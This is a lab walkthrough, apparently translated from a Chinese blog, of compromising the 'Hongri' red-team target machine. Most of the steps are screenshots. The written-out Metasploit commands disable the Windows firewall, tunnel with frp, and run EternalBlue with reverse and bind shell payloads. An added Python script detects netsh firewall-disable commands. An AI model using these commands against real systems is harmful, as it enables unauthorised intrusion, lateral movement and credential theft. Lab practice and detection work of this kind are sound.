Hongri (Red Sun) Target Machine 2
![](https://upload-images.jianshu.io/upload_images/4664072-27baa962a303bce5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Information gathering
![](https://upload-images.jianshu.io/upload_images/4664072-a0dd73c931d5230c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-a2f7eb7180213372.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-dd9feb4705f64b84.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-aac109f942baf2e8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
That failed, so switch to a different vulnerability
![](https://upload-images.jianshu.io/upload_images/4664072-d3b395395fa84410.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-894b433f0212ca6b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-5a86643a37829fbe.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-da0c585ce8c0a0f8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-cac2f62a361698dc.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Trojan upload
![](https://upload-images.jianshu.io/upload_images/4664072-7d43f3da1d9b2bad.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-9864f1e46324c7a4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-107ebfa1e204e804.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
meterpreter > background
msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set session 1
msf5 post(multi/recon/local_exploit_suggester) > run
[*] 192.168.1.128 - Collecting local exploits for java/windows...
[-] 192.168.1.128 - No suggestions available.
[*] Post module execution completed
msf5 post(multi/recon/local_exploit_suggester) >
![](https://upload-images.jianshu.io/upload_images/4664072-9a7c22100eb3ccd7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-bad5522091fdbd3a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Process migration
![](https://upload-images.jianshu.io/upload_images/4664072-862003190c10f232.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Automatic process migration
run post/windows/manage/migrate
Privilege escalation
![](https://upload-images.jianshu.io/upload_images/4664072-bbd632040fa6e198.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Set the heartbeat
Dump passwords
![](https://upload-images.jianshu.io/upload_images/4664072-68b44543d389a1ee.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Processes
![](https://upload-images.jianshu.io/upload_images/4664072-92f7bb41b151f3e7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-00c24584c9f3a05a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Port scan of the 10 network segment
![](https://upload-images.jianshu.io/upload_images/4664072-330934574d97f37c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
View users
![](https://upload-images.jianshu.io/upload_images/4664072-7f34f13e68a3d400.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Domain information
![](https://upload-images.jianshu.io/upload_images/4664072-bacec9f7161830f3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Check the firewall state and turn it off
shell netsh firewall show state
shell netsh advfirewall set allprofiles state off
![](https://upload-images.jianshu.io/upload_images/4664072-7d136a3c71f6afd5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
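The two `netsh` commands above leave a distinctive trace in process-creation logs. The following is an added detection example, not part of the original post: it classifies command lines and escalates when a firewall state query on a host is followed by a disable. The host names, parent images, event tuple layout and rule labels are constructed assumptions.

```python
import re

# Constructed process-creation records: (host, parent image, command line).
SAMPLE_EVENTS = [
    ("WEB", "java.exe", "netsh firewall show state"),
    ("WEB", "java.exe", "netsh advfirewall set allprofiles state off"),
    ("WEB", "cmd.exe", 'NETSH.exe  AdvFirewall set "publicprofile" state OFF'),
    ("PC", "explorer.exe", "netsh advfirewall set allprofiles state on"),
    ("PC", "mmc.exe", "netsh advfirewall show allprofiles"),
    ("DC", "cmd.exe", "netsh firewall set opmode disable"),
]

PROFILES = "(?:allprofiles|currentprofile|domainprofile|privateprofile|publicprofile)"
# (severity, label, pattern for the arguments that follow "netsh ")
RULES = [
    ("high", "firewall disabled", rf"advfirewall set {PROFILES} state off\b"),
    ("high", "firewall disabled (legacy syntax)", r"firewall set opmode (?:mode=)?disable\b"),
    ("info", "firewall state queried", r"(?:adv)?firewall show\b"),
]

def normalize(cmdline):
    """Lower-case, drop quotes and cmd.exe carets, collapse whitespace."""
    cleaned = cmdline.lower().replace('"', "").replace("^", "")
    return " ".join(cleaned.split())

def classify(cmdline):
    """Return (severity, label) for a netsh firewall command, else None."""
    norm = normalize(cmdline)
    for severity, label, pattern in RULES:
        if re.search(r"\bnetsh(?:\.exe)? " + pattern, norm):
            return severity, label
    return None

def scan(events):
    """Return alerts; a disable on a host that queried state first is escalated."""
    alerts, queried = [], set()
    for host, parent, cmdline in events:
        hit = classify(cmdline)
        if hit is None:
            continue
        severity, label = hit
        if severity == "info":
            queried.add(host)
        elif host in queried:
            severity, label = "critical", label + " after state query"
        alerts.append((host, severity, label, parent))
    return alerts

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

Re-enabling the firewall (`state on`) is deliberately not alerted, and the parent image is carried into the alert so an analyst can see when the command came from a service process rather than an interactive shell.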
Lateral movement
Forging a ticket
![](https://upload-images.jianshu.io/upload_images/4664072-07e01b2f86e64cc6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-4be2ec570a6b6359.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-88e4c45752a4a1af.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-d438613f80a84495.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-8be6f0fa327d30c0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-a74b960072ff9cec.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
msf
Edit the frps.ini file
vim frps.ini
![](https://upload-images.jianshu.io/upload_images/4664072-fd6ad65b30c4d325.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Start frp
./frps -c frps.ini
Edit the frpc.ini file
frpc.exe -c frpc.ini
Add a route
route add 10.10.10.0 255.255.255.0 1
route print
![](https://upload-images.jianshu.io/upload_images/4664072-2d066f6b0a293305.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
msf5 exploit(multi/handler) > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.10.10.10
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
![](https://upload-images.jianshu.io/upload_images/4664072-8fcc20c59827b6f3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Attempt exploitation
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lport 4440
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.10.10.10
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
![](https://upload-images.jianshu.io/upload_images/4664072-e0f7a5b4a947dd51.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/smb/ms17_010_psexec
msf5 exploit(windows/smb/ms17_010_psexec) > set rhost 10.10.10.10
rhost => 10.10.10.10
msf5 exploit(windows/smb/ms17_010_psexec) > set rport 445
msf5 exploit(windows/smb/ms17_010_psexec) > set payload windows/x64/shell/bind_tcp
payload => windows/x64/shell/bind_tcp
msf5 exploit(windows/smb/ms17_010_psexec) > run
![](https://upload-images.jianshu.io/upload_images/4664072-cf205cca1cc07977.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)